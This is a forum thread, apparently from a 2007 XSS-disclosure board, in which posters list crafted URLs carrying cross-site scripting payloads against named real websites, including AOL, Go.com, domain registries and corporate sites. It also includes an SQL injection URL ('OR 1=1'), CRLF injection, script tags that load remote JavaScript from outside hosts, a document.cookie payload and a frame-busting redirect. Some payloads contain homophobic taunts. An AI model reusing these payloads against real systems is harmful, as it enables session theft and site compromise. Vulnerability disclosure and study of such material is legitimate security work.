http://www.dailymail.co.uk/pages/dmsearch/overture.html?in_page_id=711&in_overture_ua=cat&in_start_number=0&in_query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&siteOr=

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://www.gay.com/search/splash.html?keywords=%3Cscript%3Ealert%28%22You+gay+ya%3F%22%29%3B%3C%2Fscript%3E&submitSearch=search&type=content&sort=date

-Lockdown-

http://www.rawrcore.net

http://shuzak.com/UniversalSearch.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Type=Communities

Finally, a Myspace for me. I haven't messed with the profile settings, I guess I'll go ahead and do that.

http://x.go.com/cgi/x.pl?goto=http://%0d%0a%0d%0a%3Cscript%3Ealert('xss');%3C/script%3E

https://register.go.com/go/login?memberName=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Funny given the domain name they own:

http://hac.kers.us/search_result.php?search_id=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

That's also an SQL injection vulnerability.

@trev: http://sla.ckers.org/forum/read.php?3,2185,2185
http://hac.kers.us/uvideos.php?UID=999999999999%20OR%201=1

Ghozt, that's where I got this site.

Damn, I auto-loaded way down to the bottom at the beginning, and I thought someone found an xss exploit in these forums. Damn.

rsnake Wrote:
-------------------------------------------------------
> That's scary! REGISTER.IT huh? Sounds secure.
> :-/
>
> But no, really, how did they get their password,
> that's the interesting part of this.


Well maybe there a fan of xss..

http://we.register.it/orders/cart/neodomain.html?domain2[hostname]=\%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&domain[tld]=us&check=1

i doubt thats the case though.

Right, let's have a look at the .de domain registry: http://www.denic.de/de/special/results.jsp?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%22

And .ru: https://www.nic.ru/whois/en/?query=%22><script>alert("XSS")</script>

http://reports.internic.net/cgi/whois?whois_nic=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&type=domain

surely you could just edit previous posts and add them, rather than add 3 in a row.

http://www.neulevel.biz/cgi-bin/whois.cgi?action=start&domain=%22%2Balert(%22XSS%22)%2B%22

@eyeced: Sorry, I'm not used to forums where editing posts is desired.

I dont no who exactly cares, its just if all the posts are simply links then it would make sense to condense them down thats all. Obviously nobody expects an entire conversation in one post.

Nominet
We manage over five million domain names, making us the world's fourth largest Internet registry. With 3,000 members, 130 staff and a turnover of £14m, we play a key role at the heart of UK e-commerce. (yet we are unable to make a secure website or even try)

http://www.nominet.org.uk/special/searchresults/?resultView=successXML&searchedDirectoryNames=all&searchString=%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E&Search.x=47&Search.y=5

http://www.lovegodsway.org/<script>alert('Donnie%20Is%20REALLY%20GAY')</script>

http://search.lilly.com/search_result.jsp?QueryText=%22%3E%27%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&query=natural&MaxDocs=50&ResultCount=10&QueryStartYear=Year&scope=lilly&scope=&ResultStart=1&ViewTemplate=docread.jsp&sectionName=Search&Coll=&adv=Y&Summaries=1&Sortspec=Score&Order=asc&QueryStartMonth=01&QueryEndMonth=12&QueryEndYear=Year

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

F5.com - http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php?name=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&areacode=&phone=&phoneExt=&region=&howtocontact=phone&action=Submit

http://search.aimpages.com/apsearchus/gallerySearch?query=%3Cscript+src%3D%22http%3A%2F%2Fckers.org%2Fs%22%3E%3C%2Fscript%3E&searchType=1&state=1&x=38&y=16


AIM's new feature aim pages too has it

http://nstalker.com/about/investors "<script>alert(XSS);</script>


They should scan their own page...


-Potti

http://www.vh1.com/search/search.jhtml?searchterm=%22;%20alert(%22XSS%22);%20%3C/script%3E

http://www.airtightnetworks.net/site_search.asp?mode=allwords&search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&submit0=Go

The proven leader. Software security. Software quality

http://www.klocwork.com/search.asp?search=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&submit=Search&mode=allwords

http://www.airforce.com/careers/subcatg.php?catg_id=%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%3C%2F%73%63%72%69%70%74%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/29/2007 03:36PM by tx.

Only Firefox and only if doubleclick ads aren't blocked: http://www.chip.de/?'onload=alert('XSS')//
And exactly the same thing on a different site: http://www.focus.de/politik?'onload=alert('XSS')//

Vulnerability is introduced by this advertising script: http://i.tfag.de/js_ng/js_ng_fol_0106.js



Edited 2 time(s). Last edit at 01/31/2007 03:47AM by trev.

@trev: for IE: http://www.focus.de/intern/';%0a%0dalert('xss');%0a%0dvar%20i='i

It actually breaks out of the Jscript at line 103.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 01/31/2007 02:50PM by tx.

From one of our anonymous lurkers:

http://shopping.aol.com/instore/ppesearch?k=%3C/title%3E%3Cscript%3Ealert('XSS')%3C/script%3E&rpshow=0

http://video.aol.com/searchresults?query=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&invocationType=aolvideo-topbox&familyFilter=1

http://music.aol.com/search/artistresults.adp?query=%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&mcState=');alert('XSS');//&siteId=ae40_prod&seamless=novl

http://autos.aol.com/?ncid=X';alert('XSS');//

http://money.aol.com/specialshub?icid=X';alert('XSS');//

http://news.aol.com/?ncid=X';alert('XSS');//

http://downloads.channel.aol.com/ggg--%3E%3Cimg%20src=x%20onerror=%22alert('XSS')%22%3E

http://kids.aol.com/at-school?dword=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&lookupbtn=Look+Up

http://personals.aol.com/love-%22;alert('XSS');var%20x%20%3d%22-advice/expressive?ncid=XXXX

- RSnake
Gotta love it. http://ha.ckers.org

Put too much work into not making this alert 28 times. -.-

[www.atari.com]

http://webclipart.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&gps="onload="alert('xss');">

There's also a redirect in the bottom frame (in the zu variable), heres a quick and dirty xss framebusting link: http://webclipart.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&gps%3D%22%6F%6E%6C%6F%61%64%3D%22%74%68%69%73%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%3D%27%6E%6F%6E%65%27%3B%22%3E&zu=%68%74%74%70%3A%2F%2F%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22%6F%6E%6C%6F%61%64%3D%22%74%68%69%73%2E%70%61%72%65%6E%74%45%6C%65%6D%65%6E%74%2E%72%6F%77%73%3D%27%31%2C%2A%27%3B

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 02/02/2007 02:58PM by tx.